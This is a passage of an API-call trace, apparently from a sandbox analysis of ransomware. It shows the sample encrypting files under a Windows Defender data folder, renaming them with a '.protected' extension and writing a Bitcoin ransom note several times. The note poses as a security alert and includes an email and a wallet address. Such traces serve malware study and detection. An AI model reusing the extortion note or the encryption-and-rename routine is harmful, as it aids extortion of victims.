Files") returned -1 [0071.669] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.669] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.669] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.669] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\.") returned 69 [0071.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.669] FindNextFileW (in: 
hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.669] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\..") returned 70 [0071.670] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.670] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.670] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="Windows") returned -1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="Program Files") returned -1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="Program Files (x86)") returned -1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="$Recycle.bin") returned 1 [0071.670] lstrcmpiW (lpString1="History.Log", lpString2="System Volume Information") returned -1 [0071.670] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.670] StrStrIW (lpFirst="History.Log", lpSrch=".protected") returned 0x0 [0071.670] lstrcmpW (lpString1="History.Log", lpString2="RESTORE_FILES.txt") returned -1 [0071.670] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0071.670] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, 
pdwDataLen=0x295ea04*=0x30) returned 1 [0071.670] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.671] StrStrW (lpFirst="History.Log", lpSrch=".txt") returned 0x0 [0071.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.671] StrStrW (lpFirst="History.Log", lpSrch=".rar") returned 0x0 [0071.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0071.671] StrStrW (lpFirst="History.Log", lpSrch=".zip") returned 0x0 [0071.671] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0071.671] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.671] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0071.672] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.696] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, 
lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0071.733] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0071.733] CloseHandle (hObject=0x14c) returned 1 [0071.733] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.protected") returned 89 [0071.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log.protected")) returned 1 [0071.733] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="Windows") returned -1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="Program Files") returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="Program Files (x86)") returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="$Recycle.bin") returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="System Volume Information") returned 1 [0071.733] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.734] StrStrIW (lpFirst="Unknown.Log", lpSrch=".protected") returned 0x0 [0071.734] lstrcmpW (lpString1="Unknown.Log", lpString2="RESTORE_FILES.txt") returned 1 [0071.734] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0071.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0071.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.734] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.734] StrStrW (lpFirst="Unknown.Log", lpSrch=".txt") returned 0x0 [0071.735] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.735] StrStrW (lpFirst="Unknown.Log", lpSrch=".rar") returned 0x0 [0071.735] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.735] StrStrW (lpFirst="Unknown.Log", lpSrch=".zip") returned 0x0 [0071.735] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x1a6e, lpOverlapped=0x0) returned 1 [0071.746] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe592, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.746] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x1a6e, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x1a6e, lpOverlapped=0x0) returned 1 [0071.747] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.747] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0071.747] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0071.747] CloseHandle (hObject=0x14c) returned 1 [0071.750] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.protected") returned 89 [0071.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.protected")) returned 1 [0071.751] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.751] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.751] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt") returned 85 [0071.751] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.772] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.773] lstrlenA (lpString="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") returned 684 [0071.773] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.773] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.773] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0071.773] CloseHandle (hObject=0xd8) returned 1 [0071.775] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="Windows") returned -1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="Program Files") returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="Program Files (x86)") returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="$Recycle.bin") returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="System Volume Information") returned -1 [0071.775] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 65 [0071.775] lstrcmpW (lpString1="Store", lpString2=".") returned 1 [0071.775] lstrcmpW (lpString1="Store", lpString2="..") returned 1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*") returned 67 [0071.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.776] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.776] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.776] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.776] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.776] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\.") returned 67 [0071.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.776] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.776] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.776] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.776] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.776] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.776] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\..") returned 68 [0071.776] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.776] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.776] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.776] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt") returned 83 [0071.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\store\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.779] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.779] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.780] lstrlenA (lpString="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") returned 684 [0071.780] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.780] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.780] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0071.780] CloseHandle (hObject=0xd8) returned 1 [0071.780] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.780] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.780] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt") returned 77 [0071.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.047] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.047] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.048] lstrlenA (lpString="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") returned 684 [0072.048] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.048] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.048] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.048] CloseHandle (hObject=0xd4) returned 1 [0072.048] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.048] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.048] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt") returned 69 [0072.048] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.049] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.049] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.049] lstrlenA (lpString="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") returned 684 [0072.049] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.050] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.050] CloseHandle (hObject=0xb4) returned 1 [0072.050] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="Windows") returned -1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="Program Files") returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="Program Files (x86)") returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="$Recycle.bin") returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="System Volume Information") returned -1 [0072.050] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned 53 [0072.050] lstrcmpW (lpString1="Support", lpString2=".") returned 1 [0072.050] lstrcmpW (lpString1="Support", lpString2="..") returned 1 [0072.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*") returned 55 [0072.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\.") returned 55 [0072.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.050] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: 
